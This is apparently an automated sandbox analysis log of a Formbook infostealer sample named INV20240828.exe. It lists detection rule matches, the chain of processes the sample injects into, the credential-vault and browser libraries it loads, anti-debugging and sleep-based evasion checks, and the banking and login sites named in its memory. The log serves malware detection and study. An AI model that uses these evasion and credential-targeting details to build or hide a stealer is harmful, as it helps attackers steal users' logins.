            Source: 00000005.00000002.4504355624.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4507474267.0000000004B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4505524370.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2396873201.0000000003FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@16/10
            Source: C:\Users\user\Desktop\INV20240828.exeFile created: C:\Users\user\AppData\Local\Temp\autD8B1.tmpJump to behavior
            Source: INV20240828.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\INV20240828.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: chkntfs.exe, 00000005.00000003.2582725536.0000000002A9E000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4504718560.0000000002A93000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4504718560.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000003.2579623174.0000000002A93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: INV20240828.exeVirustotal: Detection: 28%
            Source: INV20240828.exeReversingLabs: Detection: 63%
            Source: unknownProcess created: C:\Users\user\Desktop\INV20240828.exe "C:\Users\user\Desktop\INV20240828.exe"
            Source: C:\Users\user\Desktop\INV20240828.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\INV20240828.exe"
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\INV20240828.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\INV20240828.exe"Jump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\INV20240828.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\INV20240828.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\INV20240828.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\INV20240828.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\INV20240828.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\INV20240828.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\INV20240828.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\INV20240828.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\INV20240828.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\INV20240828.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\INV20240828.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\INV20240828.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ifsutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: INV20240828.exeStatic file information: File size 1263104 > 1048576
            Source: INV20240828.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: INV20240828.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: INV20240828.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: INV20240828.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: INV20240828.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: INV20240828.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: INV20240828.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: chkntfs.pdbGCTL source: svchost.exe, 00000002.00000002.2396389840.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364999216.0000000003627000.00000004.00000020.00020000.00000000.sdmp, umoPQplhJOFey.exe, 00000004.00000002.4505174087.0000000001318000.00000004.00000020.00020000.00000000.sdmp, umoPQplhJOFey.exe, 00000004.00000003.2336968292.000000000132B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: umoPQplhJOFey.exe, 00000004.00000000.2321112263.0000000000D8E000.00000002.00000001.01000000.00000005.sdmp, umoPQplhJOFey.exe, 00000006.00000000.2469139536.0000000000D8E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000002.00000003.2305991456.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2396528634.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2304116805.0000000003800000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000003.2404255905.00000000045CA000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000003.2401429685.0000000004411000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4505750443.000000000490E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4505750443.0000000004770000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000002.00000003.2305991456.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2396528634.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2304116805.0000000003800000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000005.00000003.2404255905.00000000045CA000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000003.2401429685.0000000004411000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4505750443.000000000490E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4505750443.0000000004770000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: chkntfs.pdb source: svchost.exe, 00000002.00000002.2396389840.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364999216.0000000003627000.00000004.00000020.00020000.00000000.sdmp, umoPQplhJOFey.exe, 00000004.00000002.4505174087.0000000001318000.00000004.00000020.00020000.00000000.sdmp, umoPQplhJOFey.exe, 00000004.00000003.2336968292.000000000132B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: chkntfs.exe, 00000005.00000002.4506411115.0000000004D9C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4504718560.0000000002A18000.00000004.00000020.00020000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505828352.000000000275C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2690302311.000000002A3FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: chkntfs.exe, 00000005.00000002.4506411115.0000000004D9C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4504718560.0000000002A18000.00000004.00000020.00020000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505828352.000000000275C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2690302311.000000002A3FC000.00000004.80000000.00040000.00000000.sdmp
            Source: INV20240828.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: INV20240828.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: INV20240828.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: INV20240828.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: INV20240828.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041583A push 0000006Eh; ret 2_2_004158D8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004158B7 push 0000006Eh; ret 2_2_004158D8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403400 push eax; ret 2_2_00403402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00405C1E push ebx; retf 2_2_00405C1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C309AD push ecx; mov dword ptr [esp], ecx2_2_03C309B6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_047A09AD push ecx; mov dword ptr [esp], ecx5_2_047A09B6
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_02655229 push ecx; ret 5_2_0265522E
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0265510F pushfd ; retf 5_2_02655128
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0265F180 push 00000052h; retn F78Dh5_2_0265F226
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_02652437 push 0000006Eh; ret 5_2_026524D5
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_026524B4 push 0000006Eh; ret 5_2_026524D5
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0264281B push ebx; retf 5_2_0264281C
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0265B963 push esi; iretd 5_2_0265B964
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044D142E push ebx; ret 5_2_044D142F
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044C34CE push ds; ret 5_2_044C34D4
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044C44A9 push edx; retf 5_2_044C44AA
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044C55AE push ecx; iretd 5_2_044C55B0
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044CD619 push ebx; retf 5_2_044CD662
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044C469E push ss; iretd 5_2_044C46A4
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044C4694 push es; ret 5_2_044C469A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044CC740 push edx; iretd 5_2_044CC741
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044D1732 push esi; ret 5_2_044D1733
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044C6077 pushad ; iretd 5_2_044C6064
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044D5172 push eax; ret 5_2_044D5174
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044CF359 push ecx; iretd 5_2_044CF35A
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_044CFB45 push ebx; ret 5_2_044CFB4B
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 6_2_04BCCE93 push ebx; retf 6_2_04BCCE94
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 6_2_04BDF636 push es; ret 6_2_04BDF63E
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 6_2_04BE00EC push eax; retf 6_2_04BE00ED
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 6_2_04BD1948 push esi; ret 6_2_04BD1952
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exeCode function: 6_2_04BD1944 push esi; ret 6_2_04BD1952
            Source: C:\Users\user\Desktop\INV20240828.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INV20240828.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\INV20240828.exeAPI/Special instruction interceptor: Address: 3D43204
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD1C0 rdtsc 2_2_03CAD1C0
            Source: C:\Windows\SysWOW64\chkntfs.exeWindow / User API: threadDelayed 9708Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\chkntfs.exeAPI coverage: 3.0 %
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 2584Thread sleep count: 264 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 2584Thread sleep time: -528000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 2584Thread sleep count: 9708 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exe TID: 2584Thread sleep time: -19416000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe TID: 2124Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe TID: 2124Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe TID: 2124Thread sleep time: -48000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe TID: 2124Thread sleep count: 42 > 30Jump to behavior
            Source: C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe TID: 2124Thread sleep time: -42000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\chkntfs.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0265C750 FindFirstFileW,FindNextFileW,FindClose,5_2_0265C750
            Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 5_2_0265C886 FindFirstFileW,FindNextFileW,FindClose,5_2_0265C886
            Source: x--942kI.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: x--942kI.5.drBinary or memory string: discord.comVMware20,11696428655f
            Source: x--942kI.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: x--942kI.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: x--942kI.5.drBinary or memory string: global block list test formVMware20,11696428655
            Source: x--942kI.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: x--942kI.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: x--942kI.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: x--942kI.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: x--942kI.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: chkntfs.exe, 00000005.00000002.4504718560.0000000002A18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
            Source: x--942kI.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: x--942kI.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: x--942kI.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: x--942kI.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: x--942kI.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: umoPQplhJOFey.exe, 00000006.00000002.4505210424.000000000067F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2691831549.000002ECAA42C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: x--942kI.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: x--942kI.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: x--942kI.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: x--942kI.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: x--942kI.5.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: x--942kI.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: x--942kI.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: x--942kI.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: x--942kI.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: x--942kI.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: x--942kI.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: x--942kI.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: x--942kI.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: x--942kI.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: x--942kI.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: x--942kI.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD1C0 rdtsc 2_2_03CAD1C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417A63 LdrLoadDll,2_2_00417A63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC3CD mov eax, dword ptr fs:[00000030h]2_2_03CEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
